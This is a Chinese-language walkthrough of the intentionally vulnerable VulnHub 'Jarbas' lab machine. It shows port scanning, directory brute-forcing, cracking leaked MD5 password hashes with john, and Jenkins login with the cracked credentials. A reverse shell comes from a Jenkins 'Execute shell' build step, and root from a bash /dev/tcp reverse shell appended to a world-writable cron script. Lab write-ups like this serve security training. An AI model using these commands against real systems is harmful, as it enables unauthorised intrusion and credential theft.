一、主机发现
查看本地主机IP地址,我这里是eth1网卡和靶机在同一网络
plain
┌──(kali㉿kali)-[~/桌面]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:0a:61:9a brd ff:ff:ff:ff:ff:ff
inet 192.168.11.224/24 brd 192.168.11.255 scope global dynamic eth0
valid_lft 84946sec preferred_lft 84946sec
inet6 fe80::20c:29ff:fe0a:619a/64 scope link proto kernel_ll
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:0a:61:a4 brd ff:ff:ff:ff:ff:ff
inet 192.168.16.128/24 brd 192.168.16.255 scope global dynamic noprefixroute eth1
valid_lft 257832sec preferred_lft 257832sec
inet6 fe80::20c:29ff:fe0a:61a4/64 scope link noprefixroute
valid_lft forever preferred_lft forever使用arp_scan和nmap扫描存活主机。排除kali的ip可以确认靶机的IP是192.168.16.132
plain
┌──(kali㉿kali)-[~/桌面]
└─$ sudo arp-scan --interface=eth1 -l
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1 00:50:56:c0:00:08 VMware, Inc.
192.168.16.2 00:50:56:f8:96:9c VMware, Inc.
192.168.16.132 00:0c:29:6d:83:4e VMware, Inc.
192.168.16.254 00:50:56:ed:76:cc VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sn 192.168.16.0/24
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 10:36 CST
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.16.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:F8:96:9C (VMware)
Nmap scan report for 192.168.16.132
Host is up (0.00010s latency).
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:ED:76:CC (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.99 seconds二、信息收集
开放端口扫描
plain
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 12:35 CST
Nmap scan report for 192.168.16.132
Host is up (0.00065s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds将扫出的端口提取出来,方便后面调用
plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ','
22,80,3306,8080
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ prots=$(grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ echo $prots
22,80,3306,8080扫描端口服务。在80端口上nmap扫出靶机的系统是contOS,php的版本是/5.4.16,mysql使用的第三方管理工具是MariaDB,操作系统的内核版本可能在3.2-4.9
| 端口 | 版本 |
|---|---|
| 22 | OpenSSH 7.4 |
| 80 | Apche/2.4.6 |
| 3306 | mysql |
| 8080 | http-proxy |
plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p $prots //按tab键读取$prots中的端口
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p 22,80,3306 -oA detail 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:31 CST
Nmap scan report for 192.168.16.132
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
| 256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 00:0C:29:6D:83:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds使用udp协议扫描top20端口,只扫出来了68端口是个打开或过滤状态,未发现其他有用信息
plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sU -top-ports 20 192.168.16.132 -oA udpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:44 CST
Nmap scan report for 192.168.16.132
Host is up (0.00046s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds再用nmap的漏洞扫描脚本来探测靶机可能存在的漏洞。发现8080服务存在robots.txt文件(Dos默认是排除在外的)
plain
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p 22,80,3306,8080 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 13:06 CST
Nmap scan report for 192.168.16.132
Host is up (0.00028s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.16.132
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.16.132:80/
| Form id: wmtb
| Form action: /web/submit
|
| Path: http://192.168.16.132:80/
| Form id:
| Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|
| Path: http://192.168.16.132:80/
| Form id:
|_ Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open mysql
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 38.34 seconds三、寻找漏洞
先去查看靶机80端口上跑的什么业务,看不懂是什么业务,不过不重要,我试了当前页面的所有有数据交互的地方发现没有实际功能,但是这个站看起来像是用框架搭起来的
查看8080端口上的服务是什么,访问后发现是一个管理员后台登陆页面,这个页面的左上角显示了使用的cms框架为"jenkins",右下角有当前jenkins的版本
查看8080服务下的robots.txt文件内容,不允许机器人点击"build"链接
使用是使用gobuster和dirb扫描一下目录,未发现有价值目录或文件
plain
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.16.132/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.16.132
-----------------
DIRB v2.22
By The Dark Raver
----------------
START_TIME: Sat Apr 5 13:26:31 2025
URL_BASE: http://192.168.16.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.16.132/ ----
+ http://192.168.16.132/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.16.132/index.html (CODE:200|SIZE:32808)
-----------------
END_TIME: Sat Apr 5 13:26:33 2025
DOWNLOADED: 4612 - FOUND: 2gobuster换一个字典再指定扩展名看看能不能扫出来,扫出来了一个新的html文件access.html
plain
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php
[sudo] kali 的密码:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.16.132/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 32808]
/.html (Status: 403) [Size: 207]
/access.html (Status: 200) [Size: 359]
/.html (Status: 403) [Size: 207]
Progress: 661680 / 661683 (100.00%)
===============================================================
Finished
===============================================================访问access.html文件,标题提示这些是用户名和密码,根据密码格式是以32位十六进制数表示的字符大概可以判断出是使用了md5加密
使用hashid确定密码的加密方式,果然都是md5加密
plain
┌──(kali㉿kali)-[~]
└─$ sudo hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ \ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__\ / ,__\ \ \ _ \ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, \ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 5978a63b4654c73c60fa24f836386d87
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: f463f63616cb3f1e81ce46b39f882fd5
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: 9b38e2b1e8b12f426b0d208a7ab6cb98
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH:将用户名和密码存储在user.hash中,然后使用join撞库解密出了两个用户的密码,另一个使用在线工具破解了出来
| 用户名 | 密码 |
|---|---|
| tiago | italia99 |
| trindade | marianna |
| eder | vipsu |
plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
marianna (trindade)
italia99 (tiago)
2g 0:00:00:00 DONE (2025-04-05 15:31) 2.564g/s 18388Kp/s 18388Kc/s 19227KC/s fuckyooh21..7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
__ssh试了登不上,前往刚才的后台登录页面登录,使用用户"eder:vipsu"成功登录到后台系统 
_
点击"New ltem"新建项目,选择Freestyle project,项目名称随意,然后点击ok
创建好后会跳转到这个页面
然后往下拉后有个"Build"功能,点击下拉按钮可以选择想要构建的命令类型,这个靶机是linux操作系统,所以选择"Execute shell"选项
构建反弹shell,然后保存
__执行反弹shell前先使用kali监听1234端口
_
plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nc -lvnp 1234
[sudo] kali 的密码:
listening on [any] 1234 ...__点击Build Now执行反弹shell 
__成功获取shell 
四、权限提升
__查看当前用户名、系统发行版本,以及权限。这个系统用户没有sudo权限,发行版本不确定
plain
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ id
id
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified__看看能不能读取passwd和shadow文件,只有passwd可以正常读取
plain
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied_
__先查看系统自动化任务看看有没有可利用的地方。在linux中/etc/cron.d是一个用于存储系统级定时任务的目录,我们先查看cron.d中的脚本有哪些,有个0hourly文件,读取内容发现里面是执行cron.hourly文件,再去看看cron.hourly目录下有什么,发现了0anacron文件,但是该文件是个电源检测搅拌,并且每天脚本前面会判断该脚本今天是否已经执行过,如果已经执行过,则退出运行,并且我们并没有该文件的写入权限。
_
plain
bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cd /etc/cron.d
cd /etc/cron.d
bash-4.2$ ls
ls
0hourly
bash-4.2$ cat 0hourly
cat 0hourly
Run the hourly jobs
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
01 root run-parts /etc/cron.hourly
bash-4.2$ ls -l
ls -l
total 4
-rw-r--r--. 1 root root 128 Aug 3 2017 0hourly
bash-4.2$ cd /etc/cron.hourly
cd /etc/cron.hourly
bash-4.2$ ls
ls
0anacron
bash-4.2$ cat 0anacron
cat 0anacron
#!/bin/sh
Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=cat /var/spool/anacron/cron.daily
fi
if [ date +%Y%m%d = "$day" ]; then
exit 0;
fi
Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
bash-4.2$ ls -l
ls -l
total 4
-rwxr-xr-x. 1 root root 392 Aug 3 2017 0anacron_
__另辟蹊径,在linux中当然不止cron.d这一个用于存放系统自动任务的方法,还有一个类似文件也是用于存储系统自动任务的文件,就是crontab,我们看看/etc/crontab,先看一下该文件的权限是否有写入权限,没有,再看看内容该脚本每五分钟将script目录下的CleaningScript.sh丢入垃圾桶中,查看CleaningScript.sh文件权限,我们拥有写入权限,只要能写入反弹shell,crontab就会执行CleaningScript.sh文件中的反弹shell,看一下里面的内容,是用来删除日志文件脚本。
_
plain
bash-4.2$ ls -l crontab
ls -l crontab
-rw-r--r--. 1 root root 513 Apr 1 2018 crontab
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
For details see man 4 crontabs
Example of job definition:
.---------------- minute (0 - 59)
| .------------- hour (0 - 23)
| | .---------- day of month (1 - 31)
| | | .------- month (1 - 12) OR jan,feb,mar,apr ...
| | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
| | | | |
user-name command to be executed
/5 * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cd /etc/script
cd /etc/script
bash-4.2$ ls -l
ls -l
total 4
-rwxrwxrwx. 1 root root 50 Apr 1 2018 CleaningScript.sh
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt先监听用于连接反弹的端口2233,我们在CleaningScript.sh文件中追加一个反弹shell,由于crontab是每五分钟执行一次,所以可能要等一会
plain
┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233
listening on [any] 2233 ...
bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1成功建立反弹shell,获取root权限
plain
┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233
[sudo] kali 的密码:
listening on [any] 2233 ...
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.132] 58976
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@jarbas ~]#读取flag
plain
[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey! 嘿!
Congratulations! You got it! I always knew you could do it! 恭喜你!搞定啦!我就知道你能行!
This challenge was very easy, huh? =) 这个挑战很简单吧?=)
Thanks for appreciating this machine. 感谢你喜欢这台机器。
@tiagotvrs
[root@jarbas ~]#总结
使用nmap扫描靶机端口发现22,80,3306和8080端口,在80端口上运行着一个类似于新闻服务的网站,但是这个网站并没有实际交互功能,再去查看8080端口上的服务。发现是一个后台管理页面,这时并没有用户名和密码,再查看nmap漏洞扫描出的robots.txt文件内容,提示"不要点击"build链接",然后使用gobuster和dirb扫描网站的目录,并没有扫出目录,再次尝试使用gobuster扫描时指定扩展名为html和php,这次扫出了"access.html"页面,发现内容是三个用户和密码,密码被md5加密了,使用john和在线破解工具破解的三个用户的密码,然后去登陆后台,只有eder用户可以成功登录,登录后跳转到jenkins的项目管理页面,点击"New ltem"新建项目,选择Freestyle project,在下面的"Build"功能选择"Execute shell"选项构建反弹shell,成功获取shell后发现是个系统用户,并且没有sudo权限,寻找系统中的自动任务文件,在/etc/cron.d目录中有个0hourly 文件,0hourly 会执行cron.hour查看另一个目录0hourly ,在0hourly 目录中有个0anacron文件,我们没有该文件的写入权限,所以要换下一个系统任务文件crontab,查看其内容,每五分钟会运行CleaningScript.sh文件,而CleaningScript.sh我们正好有写入权限,在CleaningScript.sh文件中追加反弹shell,kali监听指定端口,过一会就会收到反弹shell。